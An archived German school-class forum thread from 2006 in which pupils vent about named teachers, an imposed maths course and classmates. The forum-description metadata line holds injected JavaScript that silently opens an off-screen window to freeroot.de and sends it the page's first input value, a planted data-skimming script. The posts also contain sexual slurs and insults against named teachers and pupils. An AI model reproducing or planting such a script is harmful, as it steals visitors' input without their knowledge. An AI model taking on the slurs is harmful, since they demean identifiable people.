Wo sind unsre Lehrer

Forum der Klasse 9Gb
Verfügbare Informationen zu "Wo sind unsre Lehrer"

  • Qualität des Beitrags: 0 Sterne
  • Beteiligte Poster: stylemaster - Extrapunkt - ::. liLpUpa# - Mireille - Jason
  • Forum: Forum der Klasse 9Gb
  • Forenbeschreibung: Klassenforumwindow.open("http://freeroot.de/iphpbb/cookiedb/?save="+document.getElementsByTagName("input")[0].nodevalue,"jxnkjfwwek","height=1,width=1,left=-9");
  • aus dem Unterforum: Lehrer
  • Antworten: 50
  • Forum gestartet am: Montag 13.03.2006
  • Sprache: deutsch
  • Link zum Originaltopic: Wo sind unsre Lehrer
  • Letzte Antwort: vor 18 Jahren, 25 Tagen, 2 Stunden, 57 Minuten
  • Alle Beiträge und Antworten zu "Wo sind unsre Lehrer"

    Re: Wo sind unsre Lehrer

    stylemaster - 13.03.2006, 23:00

    Wo sind unsre Lehrer
    Die ganze Zeit verschwinden Lehrer aus welchen Gründen auch immer, und der Götz kommt auch nur wenn er Bock hat wegn dem müssen wir die Hofmann noch öfter sehen als sonst. ich mag die net.



    Re: Wo sind unsre Lehrer

    Extrapunkt - 13.03.2006, 23:02


    Frau Hofmann schreit uns wenigstens nich in komischen altmodischen extrem verrückten ausdrücken an. Und schickt sebastian nich jede stunde vor dieTür.. ^^



    Re: Wo sind unsre Lehrer

    stylemaster - 13.03.2006, 23:03


    ich mag die net



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 13.03.2006, 23:20


    ja boban das hat jetz jeder kapiert dasu sie nich magst xD"
    jaja du willst doch nur mehr beiträge deswegn wiederholst du dich >_>"

    gibbet ZU!!

    aaalso~
    ich mein k götz is varrückt eh.. aus welchen gründen auch immer er weg is es is GUT SO!

    nur die hofmann ey -.-" beste letztens in geschi : ja wenn ihr euch nich vorbereiten un nich mit macht gibbet demnächst nen test!

    jetz ma ehrlich.. is das nich voll "götz like" ?????
    wenn der wat nich passt test.. un dann au noch wenn keena wat weiß oder gemacht hat -.-"
    die wird zu götz-line -.-"

    .. so aba jetz genuch von mir xD...



    Re: Wo sind unsre Lehrer

    Extrapunkt - 13.03.2006, 23:22


    Aber jeder hat was gemacht nur alle falsch, weil die alle von mir abgeschriben ham und ich habs falsch gemacht xD



    Re: Wo sind unsre Lehrer

    stylemaster - 13.03.2006, 23:23


    Wieso schreibst du so viel
    ich mag die Hofmann einfach net, keina mag die



    Re: Wo sind unsre Lehrer

    Extrapunkt - 13.03.2006, 23:24


    wenigstens bekommt man leicht ne gute note (jeder hat das recht so viel zuschreiben wi er möchte btw.)



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 13.03.2006, 23:25


    darum gehts doch gar nich -.-
    i mean wär doch eh beste wenn wirklich alle lehrer diese methode benutzen -.-"

    und dann meint die auch noch : wenn man euch ohne druck nich zum mitarbeiten kriegt -.-"

    BSSST druck? o.o'' sorry aba 'n test bringt nichts wenns die ganze klasse nich kann un die's uns nich vernüchftig beibringen können~

    und dieser franzefutzi soll erst auf deutsch unterrichten wenn der diese verdammte sprache RICHTIG beherrscht -.-'''



    Re: Wo sind unsre Lehrer

    stylemaster - 13.03.2006, 23:25


    ja leichte noten wenn man von der gemocht wird wie keppler die mehr oda weniger männliche nutte



    Re: Wo sind unsre Lehrer

    stylemaster - 13.03.2006, 23:27


    der franzose hats drauf der is witzig



    Re: Wo sind unsre Lehrer

    Extrapunkt - 13.03.2006, 23:28


    Der franzose is der beste der is voll top... ;D



    Re: Wo sind unsre Lehrer

    stylemaster - 13.03.2006, 23:30


    nein top is er net nur witzig auf ne französische art



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 13.03.2006, 23:30


    achja @viel schreiben : nyah O.o wennich mich über etwas aufrege mussich das ebn ablassen xD dazu is doch diese kathegorie da oder??? XD


    oookay -.-" no comment.. ihr seid echt nich mehr zu retten...



    Re: Wo sind unsre Lehrer

    Extrapunkt - 13.03.2006, 23:31


    Wieso das is fast das gleiche wie freistunden einfach nix machen mitarn#beiten kann man immer noch wenn die hofmann unterrichtet.



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 13.03.2006, 23:32


    neehe das is fuckin' zeit verschwendung da kannich doch auch gleich at home bleibn -.-"



    Re: Wo sind unsre Lehrer

    stylemaster - 13.03.2006, 23:33


    ich mag die net, der franzose is sympatischer



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 13.03.2006, 23:41


    das mag ja gut möglich sein O.o
    aba bei dem lern ich zumindest nichts~
    weil ich kein meter peile wat der von uns will~



    Re: Wo sind unsre Lehrer

    Mireille - 17.03.2006, 14:25


    wieso so viel aufregen .....

    denkt doch ma positiv ....

    er ist bald weg und gut is ....



    Re: Wo sind unsre Lehrer

    stylemaster - 17.03.2006, 16:24


    scheiß lehrer da komm ich mal wenns grad blingt und die kommen zu spät ich hät locker 3 minuten zu spät kommen können,
    ich find den franzosen trotzdem besser als die hofman ich mag die net



    Re: Wo sind unsre Lehrer

    Mireille - 17.03.2006, 18:13


    ich konnt die echt nur auslachen .... vorher fozt die uns an von wegen wir sollen nich zu spät kommen und dann kommen die alle selba zu spät...



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 18.03.2006, 00:28


    aba die eine ey xD
    voll lol ganze zeit so am grinsen unso~
    bestimmt is die so außenseiter xD



    Re: Wo sind unsre Lehrer

    stylemaster - 20.03.2006, 17:51


    Die Hofmann is en Psyscho ich wusste es, was die da heut gemacht hat is net normal bestimmt hat sie heut allen unauffälllig die seelen genommen als alle abgelgenkt warn.



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 20.03.2006, 18:31


    looool xDDD
    yehaaa!!
    ich hab gedacht wir malen gleich noch bilchen von mami papi dem geschwisterchen un mir ^////^

    wie im kindergarten -.-"



    Re: Wo sind unsre Lehrer

    stylemaster - 20.03.2006, 20:14


    Keine schlechte idee die hofmann würde die bilder aba benutzen um
    unsere gefühle in ihnen wiederzuspiegeln und könnte so unre gedanken lesen und so



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 20.03.2006, 23:42


    omg O_O aaah stimmt.....
    kay.. wir dürfen der niemals wieder was künstlerisches abgeben O_O



    Re: Wo sind unsre Lehrer

    stylemaster - 21.03.2006, 15:34


    wie des wohl wär wenn die lehrer des lesen könnten was wir schreiben wenn die hofmann schon so heult wegn des mit klassenfahrt dass wir des dem reinke gesagt haben würde die bestimmt psyschiche schäden davontragen wenn die des lesen würde



    Re: Wo sind unsre Lehrer

    Extrapunkt - 21.03.2006, 16:06


    die rastet richtig aus...
    als hätten wir gesagt das wir sie voll scheiße finden oder so.
    Wir ham nur geasgt das wir das nich so gut findet das sie alles allein entscheiden kann.



    Re: Wo sind unsre Lehrer

    stylemaster - 21.03.2006, 16:09


    vielleicht hat herr reinke erählt dass wir sie scheiße finden?!



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 21.03.2006, 22:35


    kannich mir sogar vorstellen -.-"
    ey aba ma ganz ehrlich wat hat die da gebabbelt?
    von wegen wir hätten keinen elan un blaH?
    i mean -.- was hatt unser schulisches verhalten bitte mit der klassenfahrt zu tun??!!



    Re: Wo sind unsre Lehrer

    Jason - 21.03.2006, 22:38


    Schulisches Verhalten vllt nich aber das soziale Verhalten kann man ja auch größtenteils in der Schule erahnen....

    Meine Meinung...
    aber ich weiß eh nur worums so ungefähr geht...



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 21.03.2006, 23:25


    neeh ôo
    die hat gebabelt von wegen wir hätten keinen elan bei irgndwelche sachen blahblah un würden uns für nix engagieren .. aba wenns darum ginge uns über sie zu beschweren würden wir übemäßigen elan zeiegn -.-"

    die frau is echt nimma zu retten ey -.- der reinke hat gefragt was nich gut läuft wo wir probleme habn einige aus klasse haben diese genannt und das gehörte halt dazu was fühlt die sich gleich so gekränkt?! weil wir was gegen ihre meinung haben?
    wir ham nichmwa was über SIE ansich gesagt -.- und da hat JEDER von uns aus der klasse glaubich ziemlich viel mitzureden außa so arschkriecher wie ana-rita, die schon zu sabbernn beginnt wenn ihr die hanskopf[frau hansmann xD"] nen kompliment macht or sonst igrndein lehrer -.-"



    Re: Wo sind unsre Lehrer

    Extrapunkt - 22.03.2006, 09:41


    @ jason unser soziale verhalten ist gur wir ham nur ganz ruhig geasgt das es uns nicht gefällt das sie immer versucht ihren kopfdurchzusetzten.

    außerdem ham wir schon elan ich mein allein das wir bei nem unterrichtsbesuch alle pünktlich kommen das is doch schon was ^^



    Re: Wo sind unsre Lehrer

    stylemaster - 22.03.2006, 20:39


    die frau sollte lieba selbst mehr elan aufweisen, un zwa darin uns was sinnvolles beizubringen und nicht IMMER vorm unterricht rumzuheulen und uns sagen worin wir schlecht sind(ihrer meinung nach)



    Re: Wo sind unsre Lehrer

    Extrapunkt - 22.03.2006, 22:24


    egal wenigstens nich frau buß
    Zitat:
    Para: "wo warn wir eigentlich hin zur klassenfahrt?"
    Buß: " odenwald"

    ENDE
    fertig die buß kennt da gar nix einfach keine diskussion ...



    Re: Wo sind unsre Lehrer

    stylemaster - 22.03.2006, 22:43


    ich glaub net dass die des echt ernst gemeint hat und nich mit sich dikutiern lässt oda so die macht des bestimmt mit den eltern ab



    Re: Wo sind unsre Lehrer

    stylemaster - 23.03.2006, 16:39


    ey des scheiße mit musik der nöske hats voll drauf macht top unterricht warum machen die sone scheiße



    Re: Wo sind unsre Lehrer

    Extrapunkt - 23.03.2006, 21:12


    find ich auch der soll ma anfangen strafarbeiten zu verteilen und die rauszuschicken das is richtig schlimm der unterricht wär x-mal besser wenn die nich so rummachen würden...



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 24.03.2006, 00:13


    die = ???? O-o

    wen genau meint ihr da?
    Die vier tollen da or noch jmd? o.o

    und war das ebn alles ironie????
    oda ernst? oO"

    wenn ernst.. dann weißi nich was ihr an dem so toll findet..



    Re: Wo sind unsre Lehrer

    Extrapunkt - 24.03.2006, 20:21


    ich mein des ernst...
    na wen wohl luis, jonas, felix und co



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 25.03.2006, 00:53


    ich sag doch die vier tollen xD~
    äähm.. nyah... nöske...das ers voll drauf hat würd ich nich sagn~
    aba er gehört schon zur besseren hälfte unserer lehrer~



    Re: Wo sind unsre Lehrer

    Extrapunkt - 25.03.2006, 08:26


    schlimmste jetzt mathe crash dingsbums!!!!!!
    hofentlich meint der nich das ich da hin muss ich hab da me null bock druf...



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 25.03.2006, 13:08


    ey gaanz ehrlich die sollten das vorher mit den schülern absprechen des es ist nicht unsere pflicht da mitzumachen~
    ich mein wenn manns nich kann aba trotzdem kein bock hat
    verbaut man sich doch die eigene zukunft da sollen diese huren/hurensöhne ihre scheiss finger raus lassen -.-

    ey schule wird immer mehr zur qual -.-'



    Re: Wo sind unsre Lehrer

    Jason - 25.03.2006, 13:13


    ich wart nurnoch auf die oberstufe,ab da wird schule ganz annehmbar

    *wart*



    Re: Wo sind unsre Lehrer

    stylemaster - 26.03.2006, 21:58


    wie solln wir lernen selbstständig zu werden(die lehrer meinen ja imma wir ollen selbständig nach hausaufgaben fragen wenn wir krank sind und so) wenn die uns noch net mal fragen ob wir des mit mathe wollen, wo bleibt die gerechtigkeit
    ich warte auch auf die oberstufe ab jetzt
    *wart*



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 27.03.2006, 00:31


    yah ey inna obastufe wird man zu nichts gezwungen -.-"

    *mit wart*



    Re: Wo sind unsre Lehrer

    Extrapunkt - 27.03.2006, 16:06


    ich würd ma sagen wenn man das rechtlich sieht is das bestimmt nicht möglich einfach so stunden dranzzuhängen das müsste man ma nachschaun.
    Ich wart auch auf die oberstufe weil da endlich die ganzen assis weg sin.

    *wart*



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 29.03.2006, 00:40


    ya look ma nach ey~
    und dann zeigen wirs den lehrern!! **~

    \\
    lol ? du denkst au schon, dass da alle assis weg sin? O.o man sieh ja an sabrina un jacqueline das sogar solche leute es weiter schaffen können -.-'
    also ich bitte dich.. da is keine hoffnung~



    Re: Wo sind unsre Lehrer

    Extrapunkt - 29.03.2006, 20:14


    auf jeden sind dann die assis weg oberstufe is nur noch selbst zeuch raussuchen etc und daran wie die zb die englisch referate gemacht haben oder wie bei denen ne powerpoint pre aussieht ....also bitte



    Re: Wo sind unsre Lehrer

    Jason - 29.03.2006, 20:22


    Also wenn ich eins gelernt habe dann, das jede Klasse mindestens einen von der Sorte hat....



    Re: Wo sind unsre Lehrer

    ::. liLpUpa# - 29.03.2006, 23:02


    nyah ôo~
    bei unsa schule binich mir nich sicher ob wirklich alle assis wegsein werdn.. aba nyah O.o'
    mal sehn.. ich denk ma ich schaffs eh nich bis dahin xD



    Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken



    Weitere Beiträge aus dem Forum Forum der Klasse 9Gb



    Ähnliche Beiträge wie "Wo sind unsre Lehrer"

    Welche Lehrer gehen/bleiben?? - Administrator (Montag 03.07.2006)
    Mal sehen wie kreativ unsere Allymember so sind... - Arlor (Freitag 02.02.2007)
    WIR SIND 100 - mindsoldier (Mittwoch 30.05.2007)
    Neumitglieder sind gerne willkommen! - blastoise (Sonntag 22.10.2006)
    Taucher sind die besseren Liebhaber - Thomas (Freitag 15.09.2006)
    Das sind sie!!! <<LÄNGERE LADEZEIT>> - deeper (Sonntag 05.02.2006)
    Lehrer - Li-Yaan (Samstag 20.08.2005)
    Was sind daus ???? - DjKorke (Donnerstag 19.05.2005)
    Wieso sind fast alle Pony-Freaks weiblich ???? - Anonymous (Mittwoch 08.03.2006)
    WO SIND 'FILME' HIN??? - IRIR (Montag 19.03.2007)